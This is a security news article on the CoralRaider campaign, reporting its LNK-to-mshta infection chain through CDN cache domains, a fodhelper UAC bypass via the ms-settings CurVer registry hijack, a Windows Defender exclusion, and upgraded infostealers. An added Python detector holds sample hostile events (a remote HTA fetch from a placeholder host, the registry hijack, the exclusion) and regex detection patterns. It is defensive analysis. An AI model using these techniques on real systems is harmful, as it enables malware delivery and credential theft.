CoralRaider, an emerging threat actor discovered this month, is running a new campaign to spread infostealing malware by abusing content delivery network (CDN) cache domains.
The threat actor has also expanded its victim base to United States targets and is leveraging new infostealer variants to target password managers and authentication apps, and better evade detection.
Cisco Talos discovered the campaign, which has been ongoing since at least February, and revealed details about CoralRaider’s latest tactics in a blog post Tuesday.
Telemetry and open-source intelligence (OSINT) data shows that the suspected Vietnam-based cybergang has expanded its victimology from mostly Asian targets to targets spanning five continents.
Countries with affected users include the United States, Ecuador, Nigeria and the United Kingdom, among several others; Cisco Talos said users from Japanese computer service call center organizations and Syrian civil defense service organizations were also among the victims.
Malicious CDN download servers up efficiency and evasion
The CoralRaider campaign aims to spread the CryptBot, Rhadamanthys and LummaC2 infostealers in a multi-stage infection chain that uses a malicious Windows Shortcut (LNK) file as the initial attack vector and CDN cache domains as download servers.
The Cisco Talos researchers say the initial LNK file is likely spread through phishing emails directing victims to a site that performs a drive-by download of a ZIP file containing the shortcut. The infection chain is initiated when the target opens the shortcut, which is disguised as a movie file.
The LNK file embeds a PowerShell command that uses Get-ItemProperty to locate the Windows binary mshta.exe and uses it to run an HTML Application (HTA) file hosted on the attacker’s CDN domain.
This HTA file executes JavaScript that decodes and launches a PowerShell decryptor, which in turn decrypts an embedded PowerShell loader script and runs it in memory. The loader drops and executes two batch scripts: one adds the victim’s “ProgramData” folder to the Windows Defender exclusion list, and the other retrieves and runs the infostealer payloads from CoralRaider’s CDN domain.
The first batch script bypasses User Account Control (UAC) in order to write the Defender exclusion: it sets the CurVer value of the ms-settings class in the current user’s registry hive (HKCU\Software\Classes) to point at an attacker-created Programmatic Identifier (ProgID) named ServiceHostXGRT. When the auto-elevating Windows binary fodhelper.exe resolves that class, it runs the command registered under the attacker’s ProgID with elevated privileges and no UAC prompt.
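The host-side steps above leave distinctive traces: mshta.exe launched with a remote URL, a write to the ms-settings CurVer value followed by a shell\open\command under the new ProgID, an auto-elevating fodhelper.exe launch, and a new Windows Defender exclusion path. The following detector is an added example written for this article, not code from Cisco Talos or from the campaign; it runs over constructed Sysmon-style events (event ID 1 = process create, event ID 13 = registry value set) whose field names, SID, CDN hostname and command lines are placeholders, not indicators from the report. The ms-settings\CurVer location is the well-known fodhelper hijack path and is assumed here rather than quoted from the article.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


# Constructed sample events in a simplified Sysmon shape (assumption for this
# example). The hostname, SID, paths and commands are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -w hidden -c "..."', "parent": r"C:\Windows\explorer.exe"},
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://cdn-cache.example.net/update.hta",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 13, "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\ms-settings\CurVer",
     "details": "ServiceHostXGRT"},
    {"id": 13, "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\ServiceHostXGRT\Shell\Open\Command",
     "details": r"cmd.exe /c C:\ProgramData\stage2.bat"},
    {"id": 1, "image": r"C:\Windows\System32\fodhelper.exe", "cmd": "fodhelper.exe",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 13, "target": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData",
     "details": "DWORD (0x00000000)"},
    # Benign noise that must not fire: a local HTA and an ordinary CurVer key.
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Program Files\Vendor\help.hta"', "parent": r"C:\Windows\explorer.exe"},
    {"id": 13, "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\.txt\CurVer",
     "details": "txtfile"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Both fodhelper hijack variants: CurVer redirection and a direct command under ms-settings.
MS_SETTINGS_HIJACK = re.compile(
    r"\\Software\\Classes\\ms-settings\\(CurVer|Shell\\Open\\Command)$", re.IGNORECASE)
PROGID_COMMAND = re.compile(
    r"\\Software\\Classes\\([^\\]+)\\Shell\\Open\\Command$", re.IGNORECASE)
DEFENDER_EXCLUSION = re.compile(
    r"\\Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\", re.IGNORECASE)


def scan(events):
    """Return findings in event order, correlating the CurVer hijack with the
    ProgID command it points at and with a subsequent fodhelper.exe launch."""
    findings = []
    hijacked_progids = set()  # ProgIDs that ms-settings\CurVer was redirected to
    for e in events:
        if e["id"] == 1:
            image = e["image"].lower()
            if image.endswith("\\mshta.exe") and REMOTE_URL.search(e["cmd"]):
                findings.append(Finding("mshta_remote_hta", e["cmd"]))
            if image.endswith("\\fodhelper.exe") and hijacked_progids:
                findings.append(Finding("fodhelper_after_hijack", e["cmd"]))
        elif e["id"] == 13:
            target = e["target"]
            if MS_SETTINGS_HIJACK.search(target):
                findings.append(Finding("ms_settings_curver_hijack", target))
                if target.lower().endswith("\\curver"):
                    hijacked_progids.add(e["details"].lower())
            m = PROGID_COMMAND.search(target)
            if m and m.group(1).lower() in hijacked_progids:
                findings.append(Finding("hijacked_progid_command", e["details"]))
            if DEFENDER_EXCLUSION.search(target):
                findings.append(Finding("defender_exclusion_added", target))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.evidence}")
```

Only the CurVer write and the Defender exclusion are flagged on sight; the ProgID command and the fodhelper.exe launch are reported only after a hijack has been seen, which keeps the correlation rules quiet on hosts where fodhelper.exe runs for its legitimate purpose. The same ordering assumption means the rules must run over a time-ordered stream, as the sample does.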
The use of a CDN cache domain as a download server serves to improve both the efficiency and stealth of the infection chain. CDN caches are designed to reduce latency by loading content from servers closest to the user, which is ideal for services such as video streaming. When leveraged by attackers, CDNs can help infect targets in more diverse geographical locations without request delays. CDN traffic is also less likely to be scrutinized by network defenses due to the large volume of benign traffic that typically comes from these domains.
Juniper Threat Labs previously reported on campaigns abusing CDNs to spread RedLine Stealer and the LuminosityLink Remote Access Trojan (RAT), noting that servers from a range of CDN providers including Amazon CloudFront, Cloudflare, Google Firebase and Microsoft Azure have been linked to malware.
CoralRaider leverages upgraded CryptBot, LummaC2 stealers
The three infostealer payloads used by CoralRaider – CryptBot, LummaC2 and Rhadamanthys – are used to collect data such as credentials, system and browser data, financial information and cryptocurrency wallets, and exfiltrate it to the attacker’s command-and-control (C2) servers.
The CryptBot variant used in the recent campaign, which first emerged in January 2024, incorporates new methods to obstruct malware analysis, including the use of VMProtect v2.0.3-2.13.
Additionally, this variant adds password managers and authenticator apps, such as KeePass, Authy and Google Authenticator, to its list of targeted applications, which could let the threat actors into wallets and accounts that have two-factor authentication enabled.
The LummaC2 version observed in this campaign is also a new variant that appears to have been customized by the attacker, with a previously unseen obfuscation algorithm used to obfuscate the malware code.
The LummaC2 variant also attempts to connect to nine different C2 servers one by one, and different samples of the malware examined by Cisco Talos were found to each use different keys to encrypt the C2 communication.
A Rhadamanthys v0.5.0 variant was also used in the campaign, although the most recent version of the popular infostealer is v0.6.0, released in February 2024. The researchers found evidence that the threat actor is attempting to further develop the Python script that runs Rhadamanthys so that it can also execute shellcode.